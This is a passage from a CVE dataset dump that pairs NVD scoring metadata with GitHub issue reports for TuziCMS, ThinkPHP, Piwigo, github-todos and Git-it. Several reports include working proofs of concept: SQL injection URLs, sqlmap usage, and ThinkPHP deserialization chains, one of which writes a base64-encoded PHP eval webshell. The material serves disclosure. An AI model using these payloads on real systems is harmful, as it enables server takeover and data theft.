0x0c2e7fff9b60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c2e7fff9b70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c2e7fff9b80: 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c2e7fff9b90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c2e7fff9ba0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c2e7fff9bb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c2e7fff9bc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c2e7fff9bd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==7825==ABORTING
``` | heap-buffer-overflow in hevc.cpp:502:37 | https://api.github.com/repos/justdan96/tsMuxer/issues/436/comments | 0 | 2021-05-27T22:06:00Z | 2022-06-22T21:48:20Z | https://github.com/justdan96/tsMuxer/issues/436 | 904,258,488 | 436 | 2,834 |
CVE-2021-44348 | 2021-12-03T20:15:07.963 | SQL Injection vulnerability exists in TuziCMS v2.0.6 via the id parameer in App\Manage\Controller\AdvertController.class.php. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/yeyinshi/tuzicms/issues/9"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/yeyinshi/tuzicms/issues/9"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yejiao:tuzicms:2.0.6:*:*:*:*:*:*:*",
"matchCriteriaId": "8998CDEF-98D4-46B2-B8AC-72E10F37CF85",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/yeyinshi/tuzicms/issues/9 | [
"Third Party Advisory"
] | github.com | [
"yeyinshi",
"tuzicms"
] | \App\Manage\Controller\AdvertController.class.php
line: 18 - 21
public function index() {
//查询指定id的栏目信息
$id=I('get.id');//类别ID
$topnav=M('Adnav')->where("id=$id")->select();
POC:
http://127.0.0.1/index.php/Advert/Index/Adnav?id=1%20and%20(extractvalue(1,concat(0x7e,(select%20user()),0x7e))) | \App\Manage\Controller\AdvertController.class.php has SQLinject | https://api.github.com/repos/yeyinshi/tuzicms/issues/9/comments | 0 | 2021-11-28T13:04:16Z | 2021-11-28T13:05:28Z | https://github.com/yeyinshi/tuzicms/issues/9 | 1,065,326,882 | 9 | 2,835 |
CVE-2021-44349 | 2021-12-03T20:15:08.017 | SQL Injection vulnerability exists in TuziCMS v2.0.6 via the id parameter in App\Manage\Controller\DownloadController.class.php. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/yeyinshi/tuzicms/issues/8"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/yeyinshi/tuzicms/issues/8"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yejiao:tuzicms:2.0.6:*:*:*:*:*:*:*",
"matchCriteriaId": "8998CDEF-98D4-46B2-B8AC-72E10F37CF85",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/yeyinshi/tuzicms/issues/8 | [
"Third Party Advisory"
] | github.com | [
"yeyinshi",
"tuzicms"
] | \App\Manage\Controller\DownloadController.class.php
line: 18 - 21
public function index(){
//查询指定id的栏目信息
$id=I('get.id');//类别ID
$topcate=M('Column')->where("id=$id")->order('column_sort')->select();
POC:
http://127.0.0.1/index.php/Download/Index/Column?id=1%20and%20(extractvalue(1,concat(0x7e,(select%20user()),0x7e))) | \App\Manage\Controller\DownloadController.class.php has SQLinjection | https://api.github.com/repos/yeyinshi/tuzicms/issues/8/comments | 0 | 2021-11-28T13:02:52Z | 2021-11-28T13:02:52Z | https://github.com/yeyinshi/tuzicms/issues/8 | 1,065,326,603 | 8 | 2,836 |
CVE-2021-36564 | 2021-12-06T21:15:07.710 | ThinkPHP v6.0.8 was discovered to contain a deserialization vulnerability via the component vendor\league\flysystem-cached-adapter\src\Storage\Adapter.php. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/top-think/framework/issues/2559"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/top-think/framework/issues/2559"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:thinkphp:thinkphp:6.0.8:*:*:*:*:*:*:*",
"matchCriteriaId": "EBFE4365-93B9-448E-92B1-25ADEC4888C2",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"502"
] | 502 | https://github.com/top-think/framework/issues/2559 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"top-think",
"framework"
] | # thinkphp6.0.8 has a unserialize vulnerability
## Vulnerability Demo
Create Routing at `controller/Index.php`
```php
<?php
namespace app\controller;
use app\BaseController;
class Index extends BaseController
{
public function index()
{
if(isset($_POST['data'])){
@unserialize($_POST['data']);
}
}
}
```
this is my poc
```php
<?php
namespace League\Flysystem\Cached\Storage{
use League\Flysystem\Filesystem;
abstract class AbstractCache{
protected $autosave = false;
}
class Adapter extends AbstractCache
{
protected $adapter;
protected $file;
public function __construct(){
$this->complete = "*/<?php phpinfo();?>";
$this->expire = "yydsy4";
$this->adapter = new \League\Flysystem\Adapter\Local();
$this->file = "y4tacker.php";
}
}
}
namespace League\Flysystem\Adapter{
class Local extends AbstractAdapter{
}
abstract class AbstractAdapter{
protected $pathPrefix;
public function __construct(){
$this->pathPrefix = "./";
}
}
}
namespace {
use League\Flysystem\Cached\Storage\Adapter;
$a = new Adapter();
echo urlencode((serialize($a)));
}
```
The file has been generated in the directory in public

and

## Vulnerability Analysis
First one starts with __destruct, autosave can be bypassed by assigning a value of true

Next we call the save method, because this is an abstract class so we need to find the method that implements it
```
abstract class AbstractCache implements CacheInterface
```
Here I choose `vendor\league\flysystem-cached-adapter\src\Storage\Adapter.php`
`adapter` variables are controllable and it feels like write may have a write operation so we globally search for the write method

finally at `vendor\league\flysystem\src\Adapter\Local.php`

The `has` method determines if the value in the `location` variable is an existing file, in order to bypass it we need a non-existent file name, the path is completely controllable

And this one happens to have the file_put_contents method in it

The value of contents comes from what we passed in earlier and can see is `$this->getForStorage();`

The parameters are all controllable, but we need to bypass the `json_encode` method, otherwise if we pass in escape symbols it will also output

Here I pass in `*/<?php phpinfo();? >` will be commented out in front and followed by `? >` is separated, causing the vulnerability, analysis is complete | ThinkPHP6.0.8 exists unserialize vulnerability | https://api.github.com/repos/top-think/framework/issues/2559/comments | 1 | 2021-07-02T13:21:46Z | 2021-12-11T03:14:28Z | https://github.com/top-think/framework/issues/2559 | 935,767,392 | 2,559 | 2,837 |
CVE-2021-36567 | 2021-12-06T21:15:07.753 | ThinkPHP v6.0.8 was discovered to contain a deserialization vulnerability via the component League\Flysystem\Cached\Storage\AbstractCache. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 10,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 10,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/top-think/framework/issues/2561"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/top-think/framework/issues/2561"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:thinkphp:thinkphp:6.0.8:*:*:*:*:*:*:*",
"matchCriteriaId": "EBFE4365-93B9-448E-92B1-25ADEC4888C2",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"502"
] | 502 | https://github.com/top-think/framework/issues/2561 | [
"Exploit",
"Vendor Advisory"
] | github.com | [
"top-think",
"framework"
] | # PHP unserialize vulnerability in v6.0.8-2
## Vulnerability Demo
This chain does not show back on the web page, but can execute system commands, and the public chain is a little different from the Internet
First, simply write a route
```php
<?php
namespace app\controller;
use app\BaseController;
class Index extends BaseController
{
public function index()
{
if(isset($_POST['data'])){
@unserialize($_POST['data']);
}
}
}
```
exp
```php
<?php
namespace League\Flysystem\Cached\Storage{
abstract class AbstractCache
{
protected $autosave = false;
protected $complete = [];
protected $cache = ['`echo PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+|base64 -d > 2.php`'];
}
}
namespace think\filesystem{
use League\Flysystem\Cached\Storage\AbstractCache;
class CacheStore extends AbstractCache
{
protected $store;
protected $key;
public function __construct($store,$key,$expire)
{
$this->key = $key;
$this->store = $store;
$this->expire = $expire;
}
}
}
namespace think\cache{
abstract class Driver{
}
}
namespace think\cache\driver{
use think\cache\Driver;
class File extends Driver
{
protected $options = [
'expire' => 0,
'cache_subdir' => false,
'prefix' => false,
'path' => 'y4tacker',
'hash_type' => 'md5',
'serialize' => ['system'],
];
}
}
namespace{
$b = new think\cache\driver\File();
$a = new think\filesystem\CacheStore($b,'y4tacker','1111');
echo urlencode(serialize($a));
}
```
Attempt to write file successful

Ant-sword connection successful

| PHP unserialize vulnerability in v6.0.8 | https://api.github.com/repos/top-think/framework/issues/2561/comments | 0 | 2021-07-02T13:42:08Z | 2021-07-02T13:42:15Z | https://github.com/top-think/framework/issues/2561 | 935,783,589 | 2,561 | 2,838 |
CVE-2021-40313 | 2021-12-06T21:15:07.867 | Piwigo v11.5 was discovered to contain a SQL injection vulnerability via the parameter pwg_token in /admin/batch_manager_global.php. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Piwigo/Piwigo/issues/1469"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Piwigo/Piwigo/issues/1469"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:piwigo:piwigo:11.5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B6BC6DF8-D938-4413-B4C7-132BCC938E68",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/Piwigo/Piwigo/issues/1469 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"Piwigo",
"Piwigo"
] | I find that there is a sqli in piwigo,here are my descriptions;
At first we need to login and then we can Visit the website http://your-url/admin.php
then we need a Key Parameters called pwg_token,there are many ways to get a token
i visit http://your-url/admin.php?page=user_list

then i got pwg_token=3c28c3bf6adc56b0695cf64073605f9b
The point of vulnerability is in admin/batch_manager_global.php;The parameter selection is not filtered

Unfiltered parametersselection is spliced

The next step is to capture packets using BurpSuite by simply constructing parameters
selection%5B%5D=1&selectAction=delete_derivatives&submit=1&del_derivatives_type=1&del_tags%5B%5D=1&pwg_token=4a3513cd81aa311107704fd00bde0a79
Remember to replace the value of the token above

Save parameters to file,then just use sqlmap to exploit
python sqlmap.py -r 1233 --current-db
 | [11.5]SQL injection | https://api.github.com/repos/Piwigo/Piwigo/issues/1469/comments | 3 | 2021-08-29T05:50:52Z | 2021-12-08T19:35:27Z | https://github.com/Piwigo/Piwigo/issues/1469 | 982,002,210 | 1,469 | 2,839 |
CVE-2021-44684 | 2021-12-07T00:15:07.997 | naholyr github-todos 3.1.0 is vulnerable to command injection. The range argument for the _hook subcommand is concatenated without any validation, and is directly used by the exec function. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/dwisiswant0/advisory/issues/5"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/naholyr/github-todos/issues/34"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/dwisiswant0/advisory/issues/5"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/naholyr/github-todos/issues/34"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:github-todos_project:github-todos:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EFCC5BBA-A251-4207-BFEA-B40214EE9F89",
"versionEndExcluding": null,
"versionEndIncluding": "3.1.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"78"
] | 78 | https://github.com/dwisiswant0/advisory/issues/5 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"dwisiswant0",
"advisory"
] | ## Description
naholyr github-todos <= **3.1.0** is vulnerable to command injection. The range argument for the `_hook` subcommand is concatenated without any validation, and is directly used by the exec function.
**CVE ID**: CVE-2021-44684
## Proof-of-Concept

## Impact
This issue may lead to arbitrary command execution.
## References
- https://github.com/naholyr/github-todos/releases | OS Command Injection in github-todos | https://api.github.com/repos/dwisiswant0/advisory/issues/5/comments | 2 | 2021-08-05T09:13:27Z | 2021-12-06T23:39:09Z | https://github.com/dwisiswant0/advisory/issues/5 | 961,615,502 | 5 | 2,840 |
CVE-2021-44684 | 2021-12-07T00:15:07.997 | naholyr github-todos 3.1.0 is vulnerable to command injection. The range argument for the _hook subcommand is concatenated without any validation, and is directly used by the exec function. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/dwisiswant0/advisory/issues/5"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/naholyr/github-todos/issues/34"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/dwisiswant0/advisory/issues/5"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/naholyr/github-todos/issues/34"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:github-todos_project:github-todos:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EFCC5BBA-A251-4207-BFEA-B40214EE9F89",
"versionEndExcluding": null,
"versionEndIncluding": "3.1.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"78"
] | 78 | https://github.com/naholyr/github-todos/issues/34 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"naholyr",
"github-todos"
] | Hi there,
I couldn't find a `SECURITY.md` in your repository and am not sure how to best contact you privately to disclose a security issue.
Can you add a `SECURITY.md` file with an e-mail to your repository, so that our system can send you the vulnerability details? GitHub suggests that a [security policy](https://docs.github.com/en/code-security/getting-started/adding-a-security-policy-to-your-repository) is the best way to make sure security issues are responsibly disclosed.
Once you've done that, you should receive an e-mail within the next hour with more info.
Thanks! (cc @huntr-helper) | Trying to get in touch regarding a security issue | https://api.github.com/repos/naholyr/github-todos/issues/34/comments | 0 | 2021-07-20T09:57:02Z | 2021-07-20T09:57:02Z | https://github.com/naholyr/github-todos/issues/34 | 948,492,971 | 34 | 2,841 |
CVE-2021-44685 | 2021-12-07T00:15:08.043 | Git-it through 4.4.0 allows OS command injection at the Branches Aren't Just For Birds challenge step. During the verification process, it attempts to run the reflog command followed by the current branch name (which is not sanitized for execution). | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/dwisiswant0/advisory/issues/3"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/jlord/git-it-electron/releases"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/dwisiswant0/advisory/issues/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/jlord/git-it-electron/releases"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:git-it_project:git-it:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DBDE9254-C244-4B34-9CCB-467059E3AC0C",
"versionEndExcluding": null,
"versionEndIncluding": "4.4.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"78"
] | 78 | https://github.com/dwisiswant0/advisory/issues/3 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"dwisiswant0",
"advisory"
] | ## Description
Git-it through 4.4.0 allows OS command injection at the _Branches Aren't Just For Birds_ challenge step. During the verification process, it attempts to run the `reflog` command followed by the current branch name (which is not sanitized for execution).
**CVE ID**: CVE-2021-44685
## Proof-of-Concept
Vulnerable code: https://github.com/jlord/git-it-electron/blob/4f397578eb057b6b4f8d2f3ffcccc57c5213e463/lib/verify/branches_arent_just_for_birds.js#L55

> See in [high-quality video here](https://github.com/dwisiswant0/advisory/raw/master/.poc/CVE-2021-44685.mp4).
## Impact
This issue may lead to arbitrary command execution.
## References
- https://github.com/jlord/git-it-electron/releases
- https://github.com/dwisiswant0/advisory/raw/master/.poc/CVE-2021-44685.mp4 | OS Command Injection in Git-it | https://api.github.com/repos/dwisiswant0/advisory/issues/3/comments | 2 | 2021-08-05T09:11:06Z | 2021-12-06T23:48:40Z | https://github.com/dwisiswant0/advisory/issues/3 | 961,613,266 | 3 | 2,842 |
CVE-2021-44686 | 2021-12-07T00:15:08.087 | calibre before 5.32.0 contains a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service) in html_preprocess_rules in ebooks/conversion/preprocess.py. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
